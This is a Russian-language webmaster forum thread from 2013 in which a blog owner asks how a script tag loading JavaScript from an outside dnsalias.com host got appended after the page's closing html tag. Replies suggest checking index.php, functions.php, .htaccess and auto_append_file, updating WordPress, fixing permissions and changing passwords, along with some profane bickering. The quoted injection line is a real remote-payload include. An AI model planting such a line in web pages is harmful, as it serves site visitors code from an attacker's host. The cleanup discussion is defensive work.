Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Программинг, Скрипты, Софт, Сервисы
»
Тема:
Где искать дырку?
Новая тема
Ответить
цитата
21/01/13 в 18:41
mazzzer2
На блоге появился подключаемый скрипт с вирусней (может не вирусня, конечно, но это не мое
), причем вставлен он после </html>
</html><script src="http://eetitqf.dnsalias.com/js/rsize.js"></script>
Где найти как он вставляется? В футере все чисто.
цитата
21/01/13 в 18:50
Дартаньян
ищи по изменениям, лично я знаю 10 вариантов, из них 6 хитровыебаных.
Ну а так для начала, index.php в корне и functions.php проверь. также глянь htaccess там можно добавлять тоже, мало кто знает но встречал.
цитата
21/01/13 в 19:24
johndoe2
Код:
php -i | grep auto_append_file
цитата
21/01/13 в 19:41
mazzzer2
Действительно в index.php в корне было, че-то не посмотрел туда
цитата
21/01/13 в 19:56
gewi
Нужно смотреть что в логах. И разматывать цепочку латать уязвимость и чистится.
цитата
21/01/13 в 19:58
mazzzer2
Уметь бы еще это делать
цитата
21/01/13 в 20:41
Дартаньян
mazzzer2:
дай фтп доступ, деловто 10 минут.
цитата
21/01/13 в 20:47
mazzzer2
так нашел уже
остальные файлы без изменений
по фтп нельзя же логи посмотреть
цитата
21/01/13 в 20:54
Дартаньян
mazzzer2:
удалить то удалил а как залил то не знаешь ведь.
цитата
21/01/13 в 22:16
andreich
Дартаньян:
а можно поинтересоватся, как ты с FTP доступом узнаешь как его залили ?
цитата
21/01/13 в 22:28
Дартаньян
andreich:
опять, ты гвардеец, какое тебе дело до этого? Интересно? Так по гугли!
цитата
21/01/13 в 22:39
andreich
да хули мне гуглить, если нормально настроен сервак, ты даже логов по FTP не сможешь посмотреть
я тебе что Грубил ? помойму ты какойто дальний родственик suomi
mazzzer2:
если блог на WP обнови до последней версии, тут я бы вообще предложил радикальные меры, убивание всех файлов кроме папки /wp-content/ ну и конечно фала wp-config.php
ну полежит блог 5 минут ничего страшного
проверь права CHMOD на папки
посмотри что в папке /wp-content/uploads/ (в основном овно как раз туда попадает, так как папка в большинстве случаев имеет CHMOD 777
цитата
21/01/13 в 22:51
Дартаньян
andreich:
просто ты утомил меня
, на хрен мне логи? я файлики посмотрю, уверяю у меня опыт латания и администрирования этого больше чем у тебя опыта в АВМ, особенно помню про require для удаленных файлов. кстати ты когда включил allow_url_include, сапка то наверное и заработала, только для WP твой гениальный подход это смерть.
mazzzer2:
также смени пасс к ftp и админки, проверь если еще один админ или редактор какой левый, есть также
плагин
и
плагин
.
цитата
21/01/13 в 23:08
andreich
Дартаньян писал:
andreich:
просто ты утомил меня
ну может быть, но как мне кажется, это ты уже утомил всех на форуме
своми мега весерами мозга
P.S. allow_url_include было там не причем
цитата
21/01/13 в 23:13
Дартаньян
andreich писал:
мега весерами
покинь топик ты все равно в этом не шаришь.
цитата
21/01/13 в 23:22
awm5433224455
А как вы поняли что у тс вордпрес то
цитата
21/01/13 в 23:48
Дартаньян
awm5433224455:
95% что вордпресс, ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.
цитата
22/01/13 в 00:18
awm5433224455
Дартаньян писал:
ну да еще бывают адалтеры с DLE, но с них как с инвалидов смеяться нельзя.
да и вордпресс я из за этого не долюбливаю потому что в нем постоянно косяки и над ним нужно корпеть постоянно. А когда разрастается это все до нескольких сайтов тут совсем веселье начинается.
Даже гонки успел обновиться или червь пробежался по всем и проставил фрейма
цитата
22/01/13 в 00:30
Дартаньян
awm5433224455:
накатаю мануал, по безопасности для WP.
цитата
22/01/13 в 00:57
st01en
Ты сначала накатай то, что обещал
цитата
22/01/13 в 01:12
Дартаньян
st01en:
пишу, учел пожелания доброжелателей к краткому мануалу.
цитата
22/01/13 в 12:20
awm5433224455
Дартаньян писал:
awm5433224455: trollface.png накатаю мануал, по безопасности для WP.
Тут нужно осторожно писать, по безопастности лучше не писать. Научишь переломают пол интернета за ночь
цитата
22/01/13 в 12:29
andreich
awm5433224455:
че он там может написать ? там все сводится к двум вещям - CHMOD правильные и правильно настроенный сервак, вот и все
цитата
22/01/13 в 13:10
awm5433224455
скрипт кидисы всеравно сумеют нагадить своими дефейсами вида луиз сек
цитата
22/01/13 в 13:35
Дартаньян
andreich писал:
правильно настроенный сервак
вот ты и ответил о чем я напишу.
Стр.
1
,
2
>
последняя »
Новая тема
Ответить
Эта страница в полной версии